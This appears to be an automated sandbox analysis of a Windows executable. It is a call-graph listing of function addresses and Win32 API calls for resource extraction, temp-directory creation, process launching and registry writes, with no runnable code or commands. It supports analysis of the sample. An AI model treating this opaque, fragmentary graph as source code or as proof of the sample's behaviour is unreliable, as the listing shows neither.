10c24a9 FindNextFileA 2538->2539 2540 10c2431 lstrcmpA 2538->2540 2542 10c24bd FindClose RemoveDirectoryA 2539->2542 2539->2544 2540->2539 2540->2544 2541->2539 2542->2532 2543 10c658a CharPrevA 2543->2544 2544->2537 2544->2538 2544->2539 2544->2543 2545 10c2390 5 API calls 2544->2545 2545->2544 2550 10c3737 2546->2550 2552 10c372d 2546->2552 2547 10c44b9 20 API calls 2560 10c39fc 2547->2560 2548 10c6ce0 4 API calls 2549 10c2e92 2548->2549 2549->2396 2549->2402 2561 10c18a3 2549->2561 2550->2552 2553 10c38a4 2550->2553 2550->2560 2597 10c28e8 2550->2597 2552->2547 2552->2560 2553->2552 2554 10c39c1 MessageBeep 2553->2554 2553->2560 2555 10c681f 10 API calls 2554->2555 2556 10c39ce 2555->2556 2557 10c39d8 MessageBoxA 2556->2557 2558 10c67c9 EnumResourceLanguagesA 2556->2558 2557->2560 2558->2557 2560->2548 2562 10c19b8 2561->2562 2563 10c18d5 2561->2563 2564 10c6ce0 4 API calls 2562->2564 2626 10c17ee LoadLibraryA 2563->2626 2567 10c19d5 2564->2567 2567->2402 2567->2428 2568 10c18e5 GetCurrentProcess OpenProcessToken 2568->2562 2569 10c1900 GetTokenInformation 2568->2569 2570 10c1918 GetLastError 2569->2570 2571 10c19aa CloseHandle 2569->2571 2570->2571 2572 10c1927 LocalAlloc 2570->2572 2571->2562 2573 10c1938 GetTokenInformation 2572->2573 2574 10c19a9 2572->2574 2575 10c194e AllocateAndInitializeSid 2573->2575 2576 10c19a2 LocalFree 2573->2576 2574->2571 2575->2576 2580 10c196e 2575->2580 2576->2574 2577 10c1999 FreeSid 2577->2576 2578 10c1975 EqualSid 2579 10c198c 2578->2579 2578->2580 2579->2577 2580->2577 2580->2578 2580->2579 2582 10c66d5 2581->2582 2583 10c66f3 2582->2583 2585 10c66e5 CharNextA 2582->2585 2593 10c6648 2582->2593 2583->2511 2585->2582 2587 10c659b 2586->2587 2588 10c65b8 CharPrevA 2587->2588 2589 10c65ab 2587->2589 2588->2589 2589->2514 2596 10c6cf0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 2590->2596 2592 10c621d 2594 10c665d IsDBCSLeadByte 2593->2594 2595 10c6668 2593->2595 2594->2595 2595->2582 2596->2592 2598 10c2a62 2597->2598 2605 10c290d 2597->2605 2599 10c2a6e GlobalFree 2598->2599 2600 10c2a75 2598->2600 2599->2600 2600->2553 2602 10c2955 GlobalAlloc 2602->2598 2603 10c2968 GlobalLock 2602->2603 2603->2598 2603->2605 2604 10c2a20 GlobalUnlock 2604->2605 2605->2598 2605->2602 2605->2604 2606 10c2a80 GlobalUnlock 2605->2606 2607 10c2773 2605->2607 2606->2598 2608 10c28b2 2607->2608 2609 10c27a3 CharUpperA CharNextA CharNextA 2607->2609 2611 10c28b7 GetSystemDirectoryA 2608->2611 2610 10c27db 2609->2610 2609->2611 2612 10c28a8 GetWindowsDirectoryA 2610->2612 2613 10c27e3 2610->2613 2614 10c28bf 2611->2614 2612->2614 2619 10c658a CharPrevA 2613->2619 2615 10c28d2 2614->2615 2616 10c658a CharPrevA 2614->2616 2617 10c6ce0 4 API calls 2615->2617 2616->2615 2618 10c28e2 2617->2618 2618->2605 2620 10c2810 RegOpenKeyExA 2619->2620 2620->2614 2621 10c2837 RegQueryValueExA 2620->2621 2622 10c285c 2621->2622 2623 10c289a RegCloseKey 2621->2623 2624 10c2867 ExpandEnvironmentStringsA 2622->2624 2625 10c287a 2622->2625 2623->2614 2624->2625 2625->2623 2627 10c1826 GetProcAddress 2626->2627 2628 10c1890 2626->2628 2630 10c1889 FreeLibrary 2627->2630 2631 10c1839 AllocateAndInitializeSid 2627->2631 2629 10c6ce0 4 API calls 2628->2629 2632 10c189f 2629->2632 2630->2628 2631->2630 2633 10c185f FreeSid 2631->2633 2632->2562 2632->2568 2633->2630 2636 10c468f 7 API calls 2635->2636 2637 10c51f9 LocalAlloc 2636->2637 2638 10c522d 2637->2638 2639 10c520d 2637->2639 2641 10c468f 7 API calls 2638->2641 2640 10c44b9 20 API calls 2639->2640 2642 10c521e 2640->2642 2643 10c523a 2641->2643 2646 10c6285 GetLastError 2642->2646 2644 10c523e 2643->2644 2645 10c5262 lstrcmpA 2643->2645 2647 10c44b9 20 API calls 2644->2647 2648 10c527e 2645->2648 2649 10c5272 LocalFree 2645->2649 2654 10c5223 2646->2654 2650 10c524f LocalFree 2647->2650 2652 10c44b9 20 API calls 2648->2652 2651 10c2f4d 2649->2651 2650->2651 2651->2430 2651->2432 2651->2439 2653 10c5290 LocalFree 2652->2653 2653->2654 2654->2651 2656 10c468f 7 API calls 2655->2656 2657 10c5175 2656->2657 2658 10c517a 2657->2658 2659 10c51af 2657->2659 2660 10c44b9 20 API calls 2658->2660 2661 10c468f 7 API calls 2659->2661 2662 10c518d 2660->2662 2663 10c51c0 2661->2663 2662->2436 2822 10c6298 2663->2822 2667 10c51ce 2669 10c44b9 20 API calls 2667->2669 2668 10c51e1 2668->2436 2669->2662 2671 10c468f 7 API calls 2670->2671 2672 10c55c7 LocalAlloc 2671->2672 2673 10c55fd 2672->2673 2674 10c55db 2672->2674 2676 10c468f 7 API calls 2673->2676 2675 10c44b9 20 API calls 2674->2675 2677 10c55ec 2675->2677 2678 10c560a 2676->2678 2679 10c6285 GetLastError 2677->2679 2680 10c560e 2678->2680 2681 10c5632 lstrcmpA 2678->2681 2706 10c55f1 2679->2706 2682 10c44b9 20 API calls 2680->2682 2683 10c564b LocalFree 2681->2683 2684 10c5645 2681->2684 2685 10c561f LocalFree 2682->2685 2686 10c565b 2683->2686 2687 10c5696 2683->2687 2684->2683 2699 10c55f6 2685->2699 2693 10c5467 49 API calls 2686->2693 2688 10c589f 2687->2688 2689 10c56ae GetTempPathA 2687->2689 2690 10c6517 24 API calls 2688->2690 2692 10c56c3 2689->2692 2697 10c56eb 2689->2697 2690->2699 2691 10c6ce0 4 API calls 2694 10c2f7e 2691->2694 2834 10c5467 2692->2834 2696 10c5678 2693->2696 2694->2439 2694->2444 2696->2699 2700 10c5680 2696->2700 2697->2699 2702 10c586c GetWindowsDirectoryA 2697->2702 2703 10c5717 GetDriveTypeA 2697->2703 2699->2691 2701 10c44b9 20 API calls 2700->2701 2701->2706 2868 10c597d GetCurrentDirectoryA SetCurrentDirectoryA 2702->2868 2707 10c5730 GetFileAttributesA 2703->2707 2718 10c572b 2703->2718 2706->2699 2707->2718 2709 10c597d 34 API calls 2709->2718 2710 10c5467 49 API calls 2710->2697 2711 10c2630 21 API calls 2711->2718 2713 10c57c1 GetWindowsDirectoryA 2713->2718 2714 10c658a CharPrevA 2715 10c57e8 GetFileAttributesA 2714->2715 2716 10c57fa CreateDirectoryA 2715->2716 2715->2718 2716->2718 2717 10c5827 SetFileAttributesA 2717->2718 2718->2699 2718->2702 2718->2703 2718->2707 2718->2709 2718->2711 2718->2713 2718->2714 2718->2717 2719 10c5467 49 API calls 2718->2719 2864 10c6952 2718->2864 2719->2718 2721 10c6268 2720->2721 2722 10c6249 2720->2722 2724 10c597d 34 API calls 2721->2724 2723 10c44b9 20 API calls 2722->2723 2725 10c625a 2723->2725 2726 10c6277 2724->2726 2727 10c6285 GetLastError 2725->2727 2728 10c6ce0 4 API calls 2726->2728 2730 10c625f 2727->2730 2729 10c3013 2728->2729 2729->2439 2729->2451 2730->2726 2732 10c3b2d 2731->2732 2732->2732 2733 10c3b72 2732->2733 2734 10c3b53 2732->2734 2935 10c4fe0 2733->2935 2736 10c6517 24 API calls 2734->2736 2737 10c3b70 2736->2737 2738 10c6298 10 API calls 2737->2738 2739 10c3b7b 2737->2739 2738->2739 2739->2455 2741 10c2622 2740->2741 2742 10c2583 2740->2742 2965 10c24e0 GetWindowsDirectoryA 2741->2965 2743 10c25e8 RegOpenKeyExA 2742->2743 2746 10c258b 2742->2746 2745 10c25e3 2743->2745 2747 10c2609 RegQueryInfoKeyA 2743->2747 2745->2460 2746->2745 2748 10c259b RegOpenKeyExA 2746->2748 2749 10c25d1 RegCloseKey 2747->2749 2748->2745 2750 10c25bc RegQueryValueExA 2748->2750 2749->2745 2750->2749 2752 10c3bdb 2751->2752 2759 10c3bec 2751->2759 2753 10c468f 7 API calls 2752->2753 2753->2759 2754 10c3c03 memset 2754->2759 2755 10c3d13 2756 10c44b9 20 API calls 2755->2756 2784 10c3d26 2756->2784 2757 10c3f4d 2760 10c6ce0 4 API calls 2757->2760 2759->2754 2759->2755 2759->2757 2762 10c3d7b CompareStringA 2759->2762 2764 10c3fab 2759->2764 2767 10c3f1e LocalFree 2759->2767 2768 10c3f46 LocalFree 2759->2768 2771 10c3fd7 2759->2771 2772 10c468f 7 API calls 2759->2772 2774 10c3cc7 CompareStringA 2759->2774 2785 10c3e10 2759->2785 2973 10c1ae8 2759->2973 3013 10c202a memset memset RegCreateKeyExA 2759->3013 3039 10c3fef 2759->3039 2761 10c3f60 2760->2761 2761->2464 2762->2759 2762->2771 2766 10c44b9 20 API calls 2764->2766 2770 10c3fbe LocalFree 2766->2770 2767->2759 2767->2771 2768->2757 2770->2757 2771->2757 3063 10c2267 2771->3063 2772->2759 2774->2759 2775 10c3e1f GetProcAddress 2778 10c3f64 2775->2778 2775->2785 2776 10c3f92 2777 10c44b9 20 API calls 2776->2777 2779 10c3fa9 2777->2779 2780 10c44b9 20 API calls 2778->2780 2781 10c3f7c LocalFree 2779->2781 2782 10c3f75 FreeLibrary 2780->2782 2783 10c6285 GetLastError 2781->2783 2782->2781 2783->2784 2784->2757 2785->2775 2785->2776 2786 10c3eff FreeLibrary 2785->2786 2787 10c3f40 FreeLibrary 2785->2787 3053 10c6495 2785->3053 2786->2767 2787->2768 2789 10c468f 7 API calls 2788->2789 2790 10c3a55 LocalAlloc 2789->2790 2791 10c3a6c 2790->2791 2792 10c3a8e 2790->2792 2793 10c44b9 20 API calls 2791->2793 2794 10c468f 7 API calls 2792->2794 2795 10c3a7d 2793->2795 2796 10c3a98 2794->2796 2797 10c6285 GetLastError 2795->2797 2798 10c3a9c 2796->2798 2799 10c3ac5 lstrcmpA 2796->2799 2805 10c2f64 2797->2805 2800 10c44b9 20 API calls 2798->2800 2801 10c3b0d LocalFree 2799->2801 2802 10c3ada 2799->2802 2803 10c3aad LocalFree 2800->2803 2801->2805 2804 10c6517 24 API calls 2802->2804 2803->2805 2806 10c3aec LocalFree 2804->2806 2805->2430 2805->2439 2806->2805 2808 10c303c 2807->2808 2808->2439 2810 10c468f 7 API calls 2809->2810 2811 10c417d LocalAlloc 2810->2811 2812 10c41a8 2811->2812 2813 10c4195 2811->2813 2815 10c468f 7 API calls 2812->2815 2814 10c44b9 20 API calls 2813->2814 2817 10c41a6 2814->2817 2816 10c41b5 2815->2816 2818 10c41b9 2816->2818 2819 10c41c5 lstrcmpA 2816->2819 2817->2439 2821 10c44b9 20 API calls 2818->2821 2819->2818 2820 10c41e6 LocalFree 2819->2820 2820->2817 2821->2820 2823 10c171e _vsnprintf 2822->2823 2833 10c62c9 FindResourceA 2823->2833 2825 10c62cb LoadResource LockResource 2826 10c6353 2825->2826 2829 10c62e0 2825->2829 2827 10c6ce0 4 API calls 2826->2827 2828 10c51ca 2827->2828 2828->2667 2828->2668 2830 10c631b FreeResource 2829->2830 2831 10c6355 FreeResource 2829->2831 2832 10c171e _vsnprintf 2830->2832 2831->2826 2832->2833 2833->2825 2833->2826 2835 10c548a 2834->2835 2853 10c551a 2834->2853 2895 10c53a1 2835->2895 2837 10c5581 2841 10c6ce0 4 API calls 2837->2841 2840 10c5495 2840->2837 2844 10c550c 2840->2844 2845 10c54c2 GetSystemInfo 2840->2845 2846 10c559a 2841->2846 2842 10c554d 2842->2837 2851 10c597d 34 API calls 2842->2851 2843 10c553b CreateDirectoryA 2847 10c5577 2843->2847 2848 10c5547 2843->2848 2849 10c658a CharPrevA 2844->2849 2855 10c54da 2845->2855 2846->2699 2858 10c2630 GetWindowsDirectoryA 2846->2858 2850 10c6285 GetLastError 2847->2850 2848->2842 2849->2853 2854 10c557c 2850->2854 2852 10c555c 2851->2852 2852->2837 2857 10c5568 RemoveDirectoryA 2852->2857 2906 10c58c8 2853->2906 2854->2837 2855->2844 2856 10c658a CharPrevA 2855->2856 2856->2844 2857->2837 2859 10c265e 2858->2859 2860 10c266f 2858->2860 2862 10c44b9 20 API calls 2859->2862 2861 10c6ce0 4 API calls 2860->2861 2863 10c2687 2861->2863 2862->2860 2863->2697 2863->2710 2865 10c696e GetDiskFreeSpaceA 2864->2865 2866 10c69a1 2864->2866 2865->2866 2867 10c6989 MulDiv 2865->2867 2866->2718 2867->2866 2869 10c59dd GetDiskFreeSpaceA 2868->2869 2870 10c59bb 2868->2870 2872 10c5ba1 memset 2869->2872 2873 10c5a21 MulDiv 2869->2873 2871 10c44b9 20 API calls 2870->2871 2874 10c59cc 2871->2874 2875 10c6285 GetLastError 2872->2875 2873->2872 2876 10c5a50 GetVolumeInformationA 2873->2876 2877 10c6285 GetLastError 2874->2877 2878 10c5bbc GetLastError FormatMessageA 2875->2878 2879 10c5a6e memset 2876->2879 2880 10c5ab5 SetCurrentDirectoryA 2876->2880 2892 10c59d1 2877->2892 2881 10c5be3 2878->2881 2882 10c6285 GetLastError 2879->2882 2889 10c5acc 2880->2889 2884 10c44b9 20 API calls 2881->2884 2885 10c5a89 GetLastError FormatMessageA 2882->2885 2883 10c5b94 2886 10c6ce0 4 API calls 2883->2886 2887 10c5bf5 SetCurrentDirectoryA 2884->2887 2885->2881 2888 10c5c11 2886->2888 2887->2883 2888->2697 2890 10c5b0a 2889->2890 2893 10c5b20 2889->2893 2891 10c44b9 20 API calls 2890->2891 2891->2892 2892->2883 2893->2883 2918 10c268b 2893->2918 2897 10c53bf 2895->2897 2896 10c171e _vsnprintf 2896->2897 2897->2896 2898 10c658a CharPrevA 2897->2898 2901 10c5415 GetTempFileNameA 2897->2901 2899 10c53fa RemoveDirectoryA GetFileAttributesA 2898->2899 2899->2897 2900 10c544f CreateDirectoryA 2899->2900 2900->2901 2902 10c543a 2900->2902 2901->2902 2903 10c5429 DeleteFileA CreateDirectoryA 2901->2903 2904 10c6ce0 4 API calls 2902->2904 2903->2902 2905 10c5449 2904->2905 2905->2840 2907 10c58d8 2906->2907 2907->2907 2908 10c58df LocalAlloc 2907->2908 2909 10c5919 2908->2909 2910 10c58f3 2908->2910 2913 10c658a CharPrevA 2909->2913 2911 10c44b9 20 API calls 2910->2911 2916 10c5906 2911->2916 2912 10c6285 GetLastError 2917 10c5534 2912->2917 2914 10c5931 CreateFileA LocalFree 2913->2914 2915 10c595b CloseHandle GetFileAttributesA 2914->2915 2914->2916 2915->2916 2916->2912 2916->2917 2917->2842 2917->2843 2919 10c26b9 2918->2919 2920 10c26e5 2918->2920 2921 10c171e _vsnprintf 2919->2921 2922 10c26ea 2920->2922 2926 10c271f 2920->2926 2923 10c26cc 2921->2923 2924 10c171e _vsnprintf 2922->2924 2927 10c44b9 20 API calls 2923->2927 2929 10c26fd 2924->2929 2925 10c26e3 2928 10c6ce0 4 API calls 2925->2928 2926->2925 2930 10c171e _vsnprintf 2926->2930 2927->2925 2931 10c276d 2928->2931 2932 10c44b9 20 API calls 2929->2932 2933 10c2735 2930->2933 2931->2883 2932->2925 2934 10c44b9 20 API calls 2933->2934 2934->2925 2936 10c468f 7 API calls 2935->2936 2937 10c4ff5 FindResourceA LoadResource LockResource 2936->2937 2938 10c5020 2937->2938 2939 10c515f 2937->2939 2940 10c5029 GetDlgItem ShowWindow GetDlgItem ShowWindow 2938->2940 2941 10c5057 2938->2941 2939->2737 2940->2941 2957 10c4efd 2941->2957 2944 10c5060 2945 10c44b9 20 API calls 2944->2945 2951 10c5075 2945->2951 2946 10c5106 2949 10c511d 2946->2949 2950 10c5110 FreeResource 2946->2950 2947 10c50e8 2948 10c44b9 20 API calls 2947->2948 2948->2951 2952 10c513a 2949->2952 2954 10c5129 2949->2954 2950->2949 2951->2946 2952->2939 2956 10c514c SendMessageA 2952->2956 2953 10c507c 2953->2946 2953->2947 2955 10c44b9 20 API calls 2954->2955 2955->2952 2956->2939 2958 10c4f4a 2957->2958 2959 10c4980 25 API calls 2958->2959 2964 10c4fa1 2958->2964 2962 10c4f67 2959->2962 2960 10c6ce0 4 API calls 2961 10c4fc6 2960->2961 2961->2944 2961->2953 2963 10c4b60 FindCloseChangeNotification 2962->2963 2962->2964 2963->2964 2964->2960 2966 10c255b 2965->2966 2967 10c2510 2965->2967 2969 10c6ce0 4 API calls 2966->2969 2968 10c658a CharPrevA 2967->2968 2970 10c2522 WritePrivateProfileStringA _lopen 2968->2970 2971 10c2569 2969->2971 2970->2966 2972 10c2548 _llseek _lclose 2970->2972 2971->2745 2972->2966 2974 10c1b25 2973->2974 3077 10c1a84 2974->3077 2976 10c1b57 2977 10c658a CharPrevA 2976->2977 2979 10c1b8c 2976->2979 2977->2979 2978 10c66c8 2 API calls 2980 10c1bd1 2978->2980 2979->2978 2981 10c1bd9 CompareStringA 2980->2981 2982 10c1d73 2980->2982 2981->2982 2983 10c1bf7 GetFileAttributesA 2981->2983 2984 10c66c8 2 API calls 2982->2984 2985 10c1c0d 2983->2985 2986 10c1d53 2983->2986 2987 10c1d7d 2984->2987 2985->2986 2992 10c1a84 2 API calls 2985->2992 2990 10c44b9 20 API calls 2986->2990 2988 10c1df8 LocalAlloc 2987->2988 2989 10c1d81 CompareStringA 2987->2989 2988->2986 2991 10c1e0b GetFileAttributesA 2988->2991 2989->2988 2998 10c1d9b 2989->2998 3011 10c1cc2 2990->3011 2993 10c1e1d 2991->2993 2994 10c1e45 2991->2994 2995 10c1c31 2992->2995 2993->2994 3083 10c2aac 2994->3083 2996 10c1c50 LocalAlloc 2995->2996 3001 10c1a84 2 API calls 2995->3001 2996->2986 2999 10c1c67 GetPrivateProfileIntA GetPrivateProfileStringA 2996->2999 2997 10c6ce0 4 API calls 3000 10c1ea1 2997->3000 2998->2998 3002 10c1dbe LocalAlloc 2998->3002 3005 10c1cf8 2999->3005 2999->3011 3000->2759 3001->2996 3002->2986 3007 10c1de1 3002->3007 3008 10c1d09 GetShortPathNameA 3005->3008 3009 10c1d23 3005->3009 3006 10c1e89 3006->2997 3010 10c171e _vsnprintf 3007->3010 3008->3009 3012 10c171e _vsnprintf 3009->3012 3010->3011 3011->3006 3012->3011 3014 10c209a 3013->3014 3015 10c2256 3013->3015 3017 10c171e _vsnprintf 3014->3017 3020 10c20dc 3014->3020 3016 10c6ce0 4 API calls 3015->3016 3018 10c2263 3016->3018 3019 10c20af RegQueryValueExA 3017->3019 3018->2759 3019->3014 3019->3020 3021 10c20fb GetSystemDirectoryA 3020->3021 3022 10c20e4 RegCloseKey 3020->3022 3023 10c658a CharPrevA 3021->3023 3022->3015 3024 10c211b LoadLibraryA 3023->3024 3025 10c212e GetProcAddress FreeLibrary 3024->3025 3026 10c2179 GetModuleFileNameA 3024->3026 3025->3026 3028 10c214e GetSystemDirectoryA 3025->3028 3027 10c21de RegCloseKey 3026->3027 3031 10c2177 3026->3031 3027->3015 3029 10c2165 3028->3029 3028->3031 3030 10c658a CharPrevA 3029->3030 3030->3031 3031->3031 3032 10c21b7 LocalAlloc 3031->3032 3033 10c21ec 3032->3033 3034 10c21cd 3032->3034 3036 10c171e _vsnprintf 3033->3036 3035 10c44b9 20 API calls 3034->3035 3035->3027 3037 10c2218 RegSetValueExA RegCloseKey LocalFree 3036->3037 3037->3015 3040 10c4016 CreateProcessA 3039->3040 3051 10c4106 3039->3051 3041 10c40c4 3040->3041 3042 10c4041 WaitForSingleObject GetExitCodeProcess 3040->3042 3045 10c6285 GetLastError 3041->3045 3047 10c4070 3042->3047 3043 10c6ce0 4 API calls 3044 10c4117 3043->3044 3044->2759 3046 10c40c9 GetLastError FormatMessageA 3045->3046 3049 10c44b9 20 API calls 3046->3049 3110 10c411b 3047->3110 3049->3051 3050 10c4096 CloseHandle CloseHandle 3050->3051 3052 10c40ba 3050->3052 3051->3043 3052->3051 3054 10c64c2 3053->3054 3055 10c658a CharPrevA 3054->3055 3056 10c64d8 GetFileAttributesA 3055->3056 3057 10c64ea 3056->3057 3058 10c6501 LoadLibraryA 3056->3058 3057->3058 3059 10c64ee LoadLibraryExA 3057->3059 3060 10c6508 3058->3060 3059->3060 3061 10c6ce0 4 API calls 3060->3061 3062 10c6513 3061->3062 3062->2785 3064 10c2289 RegOpenKeyExA 3063->3064 3065 10c2381 3063->3065 3064->3065 3067 10c22b1 RegQueryValueExA 3064->3067 3066 10c6ce0 4 API calls 3065->3066 3068 10c238c 3066->3068 3069 10c2374 RegCloseKey 3067->3069 3070 10c22e6 memset GetSystemDirectoryA 3067->3070 3068->2757 3069->3065 3071 10c230f 3070->3071 3072 10c2321 3070->3072 3073 10c658a CharPrevA 3071->3073 3074 10c171e _vsnprintf 3072->3074 3073->3072 3075 10c233f RegSetValueExA 3074->3075 3075->3069 3078 10c1a9a 3077->3078 3080 10c1aba 3078->3080 3082 10c1aaf 3078->3082 3096 10c667f 3078->3096 3080->2976 3081 10c667f 2 API calls 3081->3082 3082->3080 3082->3081 3084 10c2be6 3083->3084 3085 10c2ad4 GetModuleFileNameA 3083->3085 3086 10c6ce0 4 API calls 3084->3086 3087 10c2b02 3085->3087 3089 10c2bf5 3086->3089 3087->3084 3088 10c2af1 IsDBCSLeadByte 3087->3088 3090 10c2bca CharNextA 3087->3090 3091 10c2b11 CharNextA CharUpperA 3087->3091 3092 10c2bd3 CharNextA 3087->3092 3095 10c2b43 CharPrevA 3087->3095 3101 10c65e8 3087->3101 3088->3087 3089->3006 3090->3092 3091->3087 3093 10c2b8d CharUpperA 3091->3093 3092->3087 3093->3087 3095->3087 3099 10c6689 3096->3099 3097 10c66a5 3097->3078 3098 10c6648 IsDBCSLeadByte 3098->3099 3099->3097 3099->3098 3100 10c6697 CharNextA 3099->3100 3100->3099 3102 10c65f4 3101->3102 3102->3102 3103 10c65fb CharPrevA 3102->3103 3104 10c6611 CharPrevA 3103->3104 3105 10c660b 3104->3105 3106 10c661e 3104->3106 3105->3104 3105->3106 3107 10c663d 3106->3107 3108 10c6634 CharNextA 3106->3108 3109 10c6627 CharPrevA 3106->3109 3107->3087 3108->3107 3109->3107 3109->3108 3111 10c4132 3110->3111 3113 10c412a 3110->3113 3114 10c1ea7 3111->3114 3113->3050 3115 10c1ed3 3114->3115 3116 10c1eba 3114->3116 3115->3113 3117 10c256d 15 API calls 3116->3117 3117->3115 3119 10c2026 3118->3119 3120 10c1ff0 RegOpenKeyExA 3118->3120 3119->2473 3120->3119 3121 10c200f RegDeleteValueA RegCloseKey 3120->3121 3121->3119 3231 10c6a20 __getmainargs 3232 10c19e0 3233 10c1a24 GetDesktopWindow 3232->3233 3234 10c1a03 3232->3234 3236 10c43d0 11 API calls 3233->3236 3235 10c1a20 3234->3235 3237 10c1a16 EndDialog 3234->3237 3239 10c6ce0 4 API calls 3235->3239 3238 10c1a33 LoadStringA SetDlgItemTextA MessageBeep 3236->3238 3237->3235 3238->3235 3240 10c1a7e 3239->3240 3241 10c7176 3242 10c717e GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3241->3242 3243 10c717a 3241->3243 3244 10c71cd 3242->3244 3243->3242 3243->3244 3245 10c7270 _except_handler4_common 3246 10c69b0 3247 10c69b5 3246->3247 3255 10c6fbe GetModuleHandleW 3247->3255 3249 10c69c1 __set_app_type __p__fmode __p__commode 3250 10c69f9 3249->3250 3251 10c6a0e 3250->3251 3252 10c6a02 __setusermatherr 3250->3252 3257 10c71ef _controlfp 3251->3257 3252->3251 3254 10c6a13 3256 10c6fcf 3255->3256 3256->3249 3257->3254 3258 10c34f0 3259 10c3504 3258->3259 3260 10c35b8 3258->3260 3259->3260 3261 10c35be GetDesktopWindow 3259->3261 3262 10c351b 3259->3262 3263 10c3526 3260->3263 3267 10c3671 EndDialog 3260->3267 3264 10c43d0 11 API calls 3261->3264 3265 10c354f 3262->3265 3266 10c351f 3262->3266 3268 10c35d6 3264->3268 3265->3263 3270 10c3559 ResetEvent 3265->3270 3266->3263 3269 10c352d TerminateThread EndDialog 3266->3269 3267->3263 3271 10c361d SetWindowTextA CreateThread 3268->3271 3272 10c35e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3268->3272 3269->3263 3273 10c44b9 20 API calls 3270->3273 3271->3263 3274 10c3646 3271->3274 3272->3271 3275 10c3581 3273->3275 3276 10c44b9 20 API calls 3274->3276 3277 10c359b SetEvent 3275->3277 3279 10c358a SetEvent 3275->3279 3276->3260 3278 10c3680 4 API calls 3277->3278 3278->3260 3279->3263 3280 10c6ef0 3281 10c6f2d 3280->3281 3283 10c6f02 3280->3283 3282 10c6f27 ?terminate@ 3282->3281 3283->3281 3283->3282

                                                          Callgraph

                                                          • Executed
                                                          • Not Executed
                                                          • Opacity -> Relevance
                                                          • Disassembly available
                                                          callgraph 0 Function_010C490C 1 Function_010C7208 2 Function_010C7000 3 Function_010C4200 4 Function_010C3100 95 Function_010C43D0 4->95 5 Function_010C4702 57 Function_010C1680 5->57 84 Function_010C16B3 5->84 6 Function_010C6C03 26 Function_010C724D 6->26 7 Function_010C2F1D 9 Function_010C621E 7->9 19 Function_010C3B26 7->19 22 Function_010C3A3F 7->22 33 Function_010C256D 7->33 35 Function_010C4169 7->35 36 Function_010C5164 7->36 52 Function_010C658A 7->52 55 Function_010C6285 7->55 74 Function_010C55A0 7->74 77 Function_010C3BA2 7->77 81 Function_010C44B9 7->81 105 Function_010C51E5 7->105 108 Function_010C6CE0 7->108 8 Function_010C171E 43 Function_010C597D 9->43 9->55 9->81 9->108 10 Function_010C681F 10->108 115 Function_010C66F9 10->115 11 Function_010C411B 72 Function_010C1EA7 11->72 12 Function_010C5C17 13 Function_010C6517 13->81 14 Function_010C3210 18 Function_010C4224 14->18 14->43 14->52 14->81 85 Function_010C58C8 14->85 14->95 15 Function_010C7010 16 Function_010C6E2A 117 Function_010C6CF0 16->117 17 Function_010C202A 17->8 17->52 17->81 17->108 18->57 18->81 19->13 62 Function_010C6298 19->62 106 Function_010C4FE0 19->106 20 Function_010C7120 21 Function_010C6A20 22->13 50 Function_010C468F 22->50 22->55 22->81 23 Function_010C6C3F 24 Function_010C4C37 25 Function_010C2630 25->81 25->108 27 Function_010C6648 28 Function_010C6F40 29 Function_010C6F54 29->1 29->26 30 Function_010C4A50 31 Function_010C3450 31->95 32 Function_010C6952 107 Function_010C24E0 33->107 34 Function_010C476D 34->13 69 Function_010C66AE 34->69 35->50 35->81 36->50 36->62 36->81 37 Function_010C5467 37->43 37->52 37->55 37->57 60 Function_010C1781 37->60 75 Function_010C53A1 37->75 37->85 37->108 38 Function_010C2267 38->8 38->52 38->108 39 Function_010C4B60 40 Function_010C6A60 40->1 40->23 40->26 41 Function_010C7060 40->41 116 Function_010C2BFB 40->116 41->15 41->20 42 Function_010C6760 53 Function_010C268B 43->53 43->55 43->81 43->108 44 Function_010C667F 44->27 45 Function_010C487A 45->0 46 Function_010C7176 47 Function_010C7270 48 Function_010C6C70 49 Function_010C2773 49->52 49->57 49->60 49->108 51 Function_010C2A89 52->84 53->8 53->81 53->108 54 Function_010C1A84 54->44 56 Function_010C4980 56->45 56->81 57->60 58 Function_010C3680 59 Function_010C6380 61 Function_010C5C9E 61->12 61->16 61->44 61->52 61->57 61->81 86 Function_010C66C8 61->86 61->108 109 Function_010C31E0 61->109 62->8 62->108 63 Function_010C4E99 63->57 64 Function_010C6495 64->52 64->60 64->108 65 Function_010C2390 65->52 65->57 65->65 65->84 65->108 66 Function_010C1F90 66->72 66->81 66->108 67 Function_010C6793 68 Function_010C2AAC 68->57 87 Function_010C17C8 68->87 103 Function_010C65E8 68->103 68->108 70 Function_010C2CAA 70->13 70->50 70->61 70->65 79 Function_010C18A3 70->79 70->81 96 Function_010C36EE 70->96 70->108 71 Function_010C6FA5 71->26 72->33 73 Function_010C4CA0 74->13 74->25 74->32 74->37 74->43 74->50 74->52 74->55 74->60 74->81 74->108 75->8 75->52 75->57 75->108 76 Function_010C6FA1 77->17 77->38 77->50 77->55 77->60 77->64 77->81 98 Function_010C3FEF 77->98 101 Function_010C1AE8 77->101 77->108 78 Function_010C72A2 97 Function_010C17EE 79->97 79->108 80 Function_010C6FBE 80->29 81->8 81->10 81->57 88 Function_010C67C9 81->88 81->108 82 Function_010C52B6 82->60 82->65 82->103 82->108 112 Function_010C1FE1 82->112 83 Function_010C69B0 83->2 83->48 83->80 99 Function_010C71EF 83->99 84->60 85->52 85->55 85->57 85->81 86->27 88->67 89 Function_010C4CC0 90 Function_010C4BC0 91 Function_010C30C0 92 Function_010C63C0 92->52 92->60 92->108 93 Function_010C4AD0 93->58 94 Function_010C4CD0 94->5 94->24 94->34 94->39 94->56 94->63 94->108 110 Function_010C47E0 94->110 95->108 96->10 96->51 96->81 96->88 102 Function_010C28E8 96->102 96->108 97->108 98->11 98->55 98->81 98->108 100 Function_010C6BEF 101->8 101->52 101->54 101->57 101->60 101->68 101->81 101->84 101->86 101->108 102->49 102->51 104 Function_010C70EB 105->50 105->55 105->81 106->50 106->81 113 Function_010C4EFD 106->113 107->52 107->108 108->117 110->57 110->81 111 Function_010C19E0 111->95 111->108 113->39 113->56 113->108 114 Function_010C70FE 116->7 116->66 116->70 116->82 118 Function_010C34F0 118->58 118->81 118->95 119 Function_010C6EF0

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
